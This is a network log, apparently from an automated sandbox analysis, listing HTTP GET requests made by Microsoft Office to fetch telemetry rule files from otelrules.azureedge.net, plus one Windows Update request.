Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=TyDlpBOuBMC4KnB&MD=cRlZhfaz HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
